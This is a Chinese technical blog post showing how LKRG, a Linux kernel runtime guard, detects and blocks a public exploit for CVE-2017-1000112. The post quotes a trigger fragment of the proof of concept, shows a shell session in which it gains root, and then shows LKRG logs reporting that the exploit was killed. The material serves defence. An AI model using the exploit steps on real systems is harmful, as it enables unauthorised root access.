Linux Kernel运行时安全检测之LKRG-实践篇

已于 2022-09-09 10:37:03 修改
阅读量1.1w 收藏 2
点赞数 1
分类专栏: Linux内核安全 Linux内核 文章标签: linux 安全 网络
于 2022-09-07 09:17:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_72742917/article/details/126690085
版权

​更多内核安全、eBPF分析和实践文章,请关注博客和公众号:

CSDN博客:内核功守道
公众号: 内核功守道

背景

从文章Linux Kernel运行时安全检测之LKRG-原理篇可以看到,LKRG可以对正在运行的Linux内核进行检测,并希望能够及时响应对正在运行的进程用户id等凭证未经授权的修改(完整性检查)。对于进程凭据,LKRG尝试检测漏洞,并在内核根据未经授权的凭据授予访问权限(例如打开文件)之前采取行动。并且是以可加载的内核模块的形式,检测正在运行的内核是否存在更改情况,以表明正在对其使用某种类型的漏洞利用。除此之外,它还可以检查系统上运行的进程,以查找对各种凭证的未经授权修改,以防止这些更改授予额外的访问权限。

以上LKRG的特性,主要是为了保护运行时内核本身的完整性,但漏洞利用通常会针对系统上运行的进程,以提高特权等,这些信息保存在内核的内存中。因此LKRG还会跟踪每个进程的一系列不同属性,并维护自己的任务列表,用于验证内核的列表。如果两个进程发生分歧,则终止受影响的进程,目的是在被漏洞利用差异之前进行防御。

下面从具体实例的角度来具体分析LKRG,让大家了解LKRG在内核安全检测方面所能实现的效果和其功能所体现出的价值。也是再次强调,任何一项策略和方案,可以作为系统级别纵深防御策略的其中一道防线,但不是“一招胜天”的灵丹妙药。

CVE-2017-1000112(UDP路径转换异常,导致memory corruption)

内核版本:Linux 4.12.6及以下存在此漏洞,内核4.12.7版本上已修复
UFO机制——UDP fragment offload

官方网站对这个漏洞的描述如下:

  • 在Linux内核中的UFO到Non-UFO的路径转换时,存在异常内存崩溃。在构建一个UFO数据包时,内核会使用MSG_MORE __ip_append_data()函数来调用ip_ufo_append_data()并完成路径的添加。
  • 但是在这两个send()调用的过程中,添加的路径可以从UFO路径转换为非UFO路径,而这将导致内存崩溃的发生。为了防止UFO数据包长度超过MTU,非UFO路径的copy = maxfraglen – skb->len将会变成false,并分配新的skb。这将会出发程序计算fraggap = skb_prev->len – maxfraglen的值,并将copy = datalen – transhdrlen – fraggap设置为false。

Linux内核UFO到非UFO路径转换时的内存崩溃问题,在构建一个UFO数据包时,内核会使用MSG_MORE __ip_append_data()函数来调用ip_ufo_append_data()并完成路径的添加。但是在这两个send()调用的过程中,添加的路径可以从UFO路径转换为非UFO路径,而这将导致内存崩溃的发生,这也是个Linux网络子系统内部漏洞的本地特权升级漏洞。

NIC (Network interface card) offload允许协议栈传输大于MTU(缺省为1500字节)的报文。当NIC offload时,内核将把多个数据包组装成一个大数据包,并将其传递给硬件,由硬件处理IP碎片和分割成mtu大小的数据包。这种卸载通常用于高速网络接口,以增加吞吐量,因为UFO可以发送大的UDP包。

以下为截图Github相关PoC中的流程部分,源代码路径:https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c

int s = socket(PF_INET, SOCK_DGRAM, 0);		//创建UDP Socket
	if (s == -1) {
		perror("[-] socket()");
		exit(EXIT_FAILURE);
	}

	struct sockaddr_in addr;
	memset(&addr, 0, sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_port = htons(8000);
	addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);

	if (connect(s, (void*)&addr, sizeof(addr))) {
		perror("[-] connect()");
		exit(EXIT_FAILURE);
	}

	int size = SHINFO_OFFSET + sizeof(struct skb_shared_info);
	int rv = send(s, buffer, size, MSG_MORE);	//用MSG_MORE发送pocket,通知内核我们稍后发送更多数据
	if (rv != size) {
		perror("[-] send()");
		exit(EXIT_FAILURE);
	}

	int val = 1;
	rv = setsockopt(s, SOL_SOCKET, SO_NO_CHECK, &val, sizeof(val));	//关闭UDP checksum
	if (rv != 0) {
		perror("[-] setsockopt(SO_NO_CHECK)");
		exit(EXIT_FAILURE);
	}
	send(s, buffer, 1, 0);		//下一次发送Non-UFO数据将触发异常
	close(s);

以上部分实验代码是说明要在内核中构建UFO包,调用send/sendto/sendmsg时使用MSG_MORE标志,它告诉内核将这个套接字上的所有数据积累到single diagram中,以便在执行没有指定该标志的调用时传输,然后触发漏洞利用。

Linux内核将信息包存储在结构sk_buff (socket缓冲区)中,所有网络层都使用该结构存储信息包的头部、关于用户数据的信息(负载)和其他内部信息。
在这里插入图片描述
如上图所示和poc.c可以看到,当使用MSG_MORE标志进行第一个发送调用时,__ip_append_data takes通过调用ip_ufo_append_data创建一个新的套接字缓冲区,在循环的第一次迭代中,copy的值变为负值,这将触发新的套接字缓冲区分配。加上fraggap计算超过MTU而触发分片,这将导致使用skb_copy_and_csum_bits函数从第一次发送调用创建的sk_buff中复制用户负载到新分配的sk_buff。从源缓冲区复制指定数量的字节到目标sk_buff,并计算校验。如果调用skb_copy_and_csum_bits的长度大于新创建的sk_buff边界结束限制,则会覆盖套接字缓冲区之外的数据,并破坏紧接在sk_buff前面的skb_shared_info结构。

test@ubuntu:~/CVE-2017-1000112$ gcc poc.c -o poc
test@ubuntu:~/CVE-2017-1000112$ id
uid=1000(test) gid=1000(test) groups=1000(test),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) context=system_u:system_r:kernel_t:s0
test@ubuntu:~/CVE-2017-1000112$ ./poc
[.] starting
[.] checking distro and kernel versions
[.] kernel version '4.8.0-52-generic' detected
[~] done, versions looks good
[.] checking SMEP and SMAP
[~] done, looks good
[.] setting up namespace sandbox
[~] done, namespace sandbox set up
[.] KASLR bypass enabled, getting kernel addr
[~] done, kernel text:   ffffffff82a00000
[.] commit_creds:        ffffffff82aa5d00
[.] prepare_kernel_cred: ffffffff82aa60f0
[.] SMEP bypass enabled, mmapping fake stack
[~] done, fake stack mmapped
[.] executing payload ffffffff82a17c55
[~] done, should be root now
[.] checking if we got root
[+] got r00t ^_^
root@ubuntu:/home/test/CVE-2017-1000112# id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:kernel_t:s0
root@ubuntu:/home/test/CVE-2017-1000112# exit
exit
test@ubuntu:~/CVE-2017-1000112$

以上结果显示执行成功,也就是漏洞利用成功,这类问题核心在于覆写了cred/read_cred结构体。针对于以上漏洞利用的特点,可以利用LKRG的pCFI来检测相关数据完整性以及检测覆写cred/read_cred结构体的功能,检测SEMP、SMAP、KALSR等的修改,来实现对此类问的防御,下面为部分检测代码,全部代码在:https://github.com/lkrg-org/lkrg/tree/main/src/modules/exploit_detection/syscalls/pCFI和p_exploit_detection.c

//创建creds Hook
static const struct p_functions_hooks {

   const char *name;
   int (*install)(int p_isra);
   void (*uninstall)(void);
   int p_fatal;
   const char *p_error_message;
   int is_isra_safe;

} p_functions_hooks_array[] = {
   {
     "security_bprm_committing_creds",	
     p_install_security_bprm_committing_creds_hook,
     p_uninstall_security_bprm_committing_creds_hook,
     1,
     NULL,
     1
  -......

// dump  creds并对比结果
notrace void p_dump_creds(struct p_cred *p_where, const struct cred *p_from) {

   /* Get reference to cred */
   get_cred(p_from);

   /* Track process's capabilities */
   memcpy(&p_where->cap_inheritable, &p_from->cap_inheritable, sizeof(kernel_cap_t));
   memcpy(&p_where->cap_permitted, &p_from->cap_permitted, sizeof(kernel_cap_t));
   memcpy(&p_where->cap_effective, &p_from->cap_effective, sizeof(kernel_cap_t));
   memcpy(&p_where->cap_bset, &p_from->cap_bset, sizeof(kernel_cap_t));
#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 3, 0)
   memcpy(&p_where->cap_ambient, &p_from->cap_ambient, sizeof(kernel_cap_t));
#endif

   /* Track process's IDs */
   p_set_uid(&p_where->uid, p_get_uid(&p_from->uid));
   p_set_gid(&p_where->gid, p_get_gid(&p_from->gid));
   p_set_uid(&p_where->suid, p_get_uid(&p_from->suid));
   p_set_gid(&p_where->sgid, p_get_gid(&p_from->sgid));
   p_set_uid(&p_where->euid, p_get_uid(&p_from->euid));
   p_set_gid(&p_where->egid, p_get_gid(&p_from->egid));
   p_set_uid(&p_where->fsuid, p_get_uid(&p_from->fsuid));
   p_set_gid(&p_where->fsgid, p_get_gid(&p_from->fsgid));

   /* Track process's securebits - TODO: research */
   p_where->securebits = p_from->securebits;

   /* Track process's critical pointers */
   p_where->user     = p_from->user;
   p_where->user_ns  = p_from->user_ns;

   /* Release reference to cred */
   put_cred(p_from);
}
   },/

当在此版本内核中加载LKRG后,再次执行PoC,可以看到该漏洞利用已经被检测并阻断,从kernel log中可以清晰看到“Detected pointer swapping attack!process[2399 | poc] has different ‘cred’ pointer [0xffff8d1bab32ed80 vs 0xffff8d1bb1a50180]”:

test@ubuntu:~/CVE-2017-1000112$ id
uid=1000(test) gid=1000(test) groups=1000(test),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) context=system_u:system_r:kernel_t:s0
test@ubuntu:~/CVE-2017-1000112$ ./poc
[.] starting
[.] checking distro and kernel versions
[.] kernel version '4.8.0-52-generic' detected
[~] done, versions looks good
[.] checking SMEP and SMAP
[~] done, looks good
[.] setting up namespace sandbox
[~] done, namespace sandbox set up
[.] KASLR bypass enabled, getting kernel addr
[~] done, kernel text:   ffffffff82a00000
[.] commit_creds:        ffffffff82aa5d00
[.] prepare_kernel_cred: ffffffff82aa60f0
[.] SMEP bypass enabled, mmapping fake stack
[~] done, fake stack mmapped
[.] executing payload ffffffff82a17c55
[~] done, should be root now
[.] checking if we got root
Killed
test@ubuntu:~/CVE-2017-1000112$ id
uid=1000(test) gid=1000(test) groups=1000(test),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) context=system_u:system_r:kernel_t:s0
test@ubuntu:~/CVE-2017-1000112$

ubuntu kernel: [  228.864932] [p_lkrg] Loading LKRG...
ubuntu kernel: [  229.159677] [p_lkrg] LKRG initialized successfully!
ubuntu kernel: [  235.372066] [p_lkrg] <Exploit Detection> Detected pointer swapping attack!process[2399 | poc] has different 'cred' pointer [0xffff8d1bab32ed80 vs 0xffff8d1bb1a50180]
ubuntu kernel: [  235.372104] [p_lkrg] <Exploit Detection> Detected pointer swapping attack!process[2399 | poc] has different 'real_cred' pointer [0xffff8d1bab32ed80 vs 0xffff8d1bb1a50180]
ubuntu kernel: [  235.372137] [p_lkrg] <Exploit Detection> process[2399 | poc] has different UID! 1000 vs 0
ubuntu kernel: [  235.372155] [p_lkrg] <Exploit Detection> process[2399 | poc] has different EUID! 1000 vs 0
ubuntu kernel: [  235.372174] [p_lkrg] <Exploit Detection> process[2399 | poc] has different SUID! 1000 vs 0
ubuntu kernel: [  235.372192] [p_lkrg] <Exploit Detection> process[2399 | poc] has different FSUID! 1000 vs 0
ubuntu kernel: [  235.372210] [p_lkrg] <Exploit Detection> process[2399 | poc] has different GID! 1000 vs 0
ubuntu kernel: [  235.372228] [p_lkrg] <Exploit Detection> process[2399 | poc] has different EGID! 1000 vs 0
ubuntu kernel: [  235.372247] [p_lkrg] <Exploit Detection> process[2399 | poc] has different SGID! 1000 vs 0
ubuntu kernel: [  235.372265] [p_lkrg] <Exploit Detection> process[2399 | poc] has different FSGID! 1000 vs 0
ubuntu kernel: [  235.372284] [p_lkrg] <Exploit Detection> Trying to kill process[poc | 2399]!

结论

从上述例子可以看到,LKRG在非法提权中的覆写cred/read_cred结构体这个类型的漏洞利用上,起到了关键的检测和阻断作用。当然,如上篇所说,可以通过一些方法来绕过LKRG,但复杂度和难度会成倍的增加,这也就是为什么会一直强调,任何一项策略和方案,可以作为系统级别纵深防御策略的其中一道防线,但不是“一招胜天”的灵丹妙药,只有构建多层级防御矩阵,以及多个角度来解析安全问题,才会达到更好的效果。

芯光未来
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
(转载)Linux内核漏洞浅析
Kendiv's Box
11-07 3550
Linux内核漏洞浅析文章属性:转载(http://www.xfocus.net/articles/200410/746.html)与Windows相比,Linux被认为具有更好的安全性和其他扩展性能。这些特性使得Linux在操作系统领域异军突起,得到越来越多的重视。随着Linux应用量的增加,其安全性也逐渐受到了公众甚或黑客的关注。那么,Linux是否真的如其支持厂商们所宣称的那样安全呢?本期我
Linux 内核观测技术 eBPF 中文入门指南
easylife206的专栏
01-06 2853
公众号关注「奇妙的 Linux 世界」设为「星标」,每天带你玩转 Linux !很早前就想写一关于 eBPF 的文章,但是迟迟没有动手,这两天有点时间,所以就来写一。这文章主要还是简单的介绍 eBPF 是用来干什么的,并通过几个示例来介绍是怎么玩的。这个技术非常非常之强,Linux 操作系统的观测性实在是太强大了,并在 BCC 加持下变得一览无余。这个技术不是一般的运维人员或是系统管理员可以...
linux内核实践 linux内核实操 linux内核理解
yuezhilangniao的博客
05-28 153
linux核心功能就是:管理硬件设备,供应用程序使用。而现代计算机(无论是PC还是嵌入式系统)的标准组成,就是CPU、Memory(内存和外存)、输入输出设备、网络设备和其它的外围设备。
带你走进Linux内核安全新世界
Rethinking the Kernel
07-23 1万+
什么是安全?“1500多年前,由从梵文译成汉文的《百喻经·愿为王剃须喻》中讲述了亲信救王的故事。故事中写道:“昔者有王,有一亲信,于军阵中,殁命救王,使得安全。”这里的安全是指一种状态,在这种状态下,某种对象或者对象的某种属性是不受威胁的。”...............
加载linux kernel安全机制分析
李子的备忘录
10-28 1401
参考文件:system/core/libmincrypt/sha.c                     system/core/mkbootimg/mkbootimg.c 首先,一般bootimage 的结构如下 (1 page 有可能是2048或4096,具体看flash的类型) ** +-----------------+ ** | boot header     | 1 p
linux 内核级 杀毒,Linux下内核级Rootkit检测防护机制的研究
weixin_35881820的博客
05-05 237
摘要:随着计算机技术的发展,计算机在越来越多的领域得到了应用。由于Linux系统的开源性,使其深受广大用户的喜爱,那么Linux系统的安全也比以往任何时候都显得重要。随着Linux下Rootkit技术的不断深入以及其破坏越来越大,增加Linux系统的安全迫在眉睫。 论文首先介绍了Rootkit的基本知识,Linux系统下内核级Rootkit术在国内外的发展现状。由于Rootkit的发展很快,而且破...
OSTconf2020-LKRG-In-A-Nutshell.pdf
05-07
本演示文稿是LKRG(CONFidence 2018)的更新版本OSTconf 2020;介绍了LKRG的原理;反向shell;系统完整性;通信信道;效能及可延展性
欧美电脑主机模板
11-29
4. LKRG____.PFB 和 LKRG____.PFM:这些是字体文件,用于在网页中显示特定的字体样式。 5. e-commerce1.psd:这是Photoshop的源文件,用于编辑和修改模板的图形设计。 6. SANTEEIT.TTF:另一个字体文件,可能用于...
总结Linux系统环境初始化、系统安全加固措施和系统内核优化
ZHUZIH6的博客
12-13 1329
总结Linux系统环境初始化、系统安全加固措施和系统内核优化的操作
【Exploit trick】利用CVE-2021-26708 绕过LKRG缓解机制
panhewu9919的博客
10-18 619
LKRG source code 绕过LKRG总结:构造ROP链给两个函数打patch,p_check_integrity()(负责检查内核完整性)和p_cmp_creds()(负责检查进程凭证)。补丁程序为0x48 0x31 0xc0 0xc3,也就是xor rax, rax ; ret或return 0,打完补丁后提权即可。打补丁函数采用void *text_poke(void *addr, const void *opcode, size_t len),kprobes中也用到了该函数。 1. 回顾CV
Linux Kernel运行时安全检测LKRG-原理
Rethinking the Kernel
09-01 1万+
虽然经常更新内核版本通常被认为是一种安全最佳实践,但由于各种原因,尤其是生产环境中的服务器无法这样操作。这就意味着在机器运行时,会存在利用已知的漏洞(当然,还会有一些未知的漏洞)来进行攻击的情况,所以需要某种方法来检测和阻止对这些漏洞的利用,这正是Linux Kernel Runtime Guard(Linux内核运行时保护LKRG)诞生目的所在。...
【转】Linux内核安全技术(一)——开源演进回顾
最新发布
叫好与叫座虽然不是对立面,但想在同一个作品中达到双重效果很难。
06-10 366
如今Android智能设备的安全和隐私保护技术&体验已越来越好,但很多老用户,可能对早年Android手机的各种漏洞、“一键root”工具还有印象。(记得当时买的小米,有个专门的root论坛,时光好快)那位于Android系统底层的Linux内核,在这些年发展中,它的安全特性有哪些变化呢?本文是Linux内核安全技术系列的第一,希望通过回顾开源内核安全技术演进过程,回答上述问题。本文回顾2010~2022年开源内核安全技术的发展和演进过程。
[ Linux ] 如何查看内核 Kernel 版本(查多个Kernel的方法)
我在山城重庆,我希望能为这片软件沙漠地带贡献自己的一滴水,Stay tuned!
11-18 1万+
内核是与计算机硬件接口的易替换软件的最低级别。它负责将所有以“用户模式”运行的应用程序连接到物理硬件,并允许称为服务器的进程使用进程间通信(IPC)彼此获取信息。内核是操作系统的主要组件,无论是Mac OS、Linux还是windows。内核处理系统的资源,并充当系统硬件和软件之间的桥梁。下图是我画的一个关系图,更能通俗易懂(如转载请注明出处)
Linux 安全缓解机制总结
panhewu9919的博客
06-28 5913
学习资料: linux-kernel-defence-map A Decade of Linux Kernel Vulnerabilities, their Mitigation and Open Problems-2017 The State of Kernel Self Protection-2018 PaX/Grsecurity 代码分析——各种安全机制 Linux每个版本对应的安全更新 linux安全机制的论文 防护研究团队: SELinux (NSA)、AppArmor
Linux安全之SELinux理解
mengmeng_921的博客
09-30 2607
安全增强式 Linux(SELinux)是一种强制访问控制的实现。它的作法是以最小权限原则为基础,在 Linux 核心中使用 Linux 安全模块。它并非一个 Linux 发行版,而是一组可以应用在类 Unix 操作系统(如 Linux、BSD 等)的修改。SELinux 更能遵从最小权限的理念安全增强式SELinux是一个在内核中实践的强制访问控制安全性机制Linux安全之SELinux理解两种访问控制DAC:自主访问控制MAC:强制访问控制SELinux有两种工作级别。
Linux内核与安全
咖啡男孩之SRE之路
04-04 1841
本文主要深入讲解了linux安全机制、bash shell的一些技巧、以及linux在使用过程中一些需要注意的小技巧。
Linux 内核安全模块学习总结
bcbobo21cn的专栏
03-15 1万+
Linux安全模块(LSM) LSM是Linux Secrity Module的简称,即linux安全模块。其是一种轻量级通用访 问控制框架,适合于多种访问控制模型在它上面以内核可加载模块的形实现。用 户可以根据自己的需求选择合适的安全模块加载到内核上实现。 LSM设计思想: LSM的设计思想:在最少改变内核代码的情况下,提供一个能够成功实现强制访 问控制模块需要的结构或者接口。L
linux安全加固技术--内核安全模块LSM
热门推荐
softgmx的博客
08-31 2万+
Linux安全相关技术 SELinux AppArmor openSSL TPM SGX LSM   linux上六种常用的安全加固技术: 1 安全的编码(Secure Code),减少编写的错误。 2 应用层漏洞缓解技术(Application-level exploitation)(SSP,relro) 3 系统级漏洞缓解技术(System-level exploit mi...
Android的安全机制 1 -- 老罗
快乐&&平凡
04-21 4259
Android是一个基于Linux内核的移动操作系统。Linux是一个支持多用户的系统,系统中的文件的访问权限是通过用户ID(UID)和用户组ID(GID)来控制的。换句话说,就是Linux安全机制是基于UID和GID来实现的。Android在Linux内核提供的基于UID和GID的安全机制的基础上,又实现了一套称为Permission的安全机制,如图1所示: 图1 Linux的UID
LKRG技术概览:保护系统完整性的更新与实践
"OSTconf2020-LKRG-In-A-Nutshell.pdf" 是一份关于LKRGLinux Kernel Runtime Guard)的详细介绍,由Adam 'pi3' Zabrocki在2020年的OSTconf会议上发表。该文稿是2018年CONFidence会议版本的更新,涵盖了LKRG的核心...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芯光未来

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值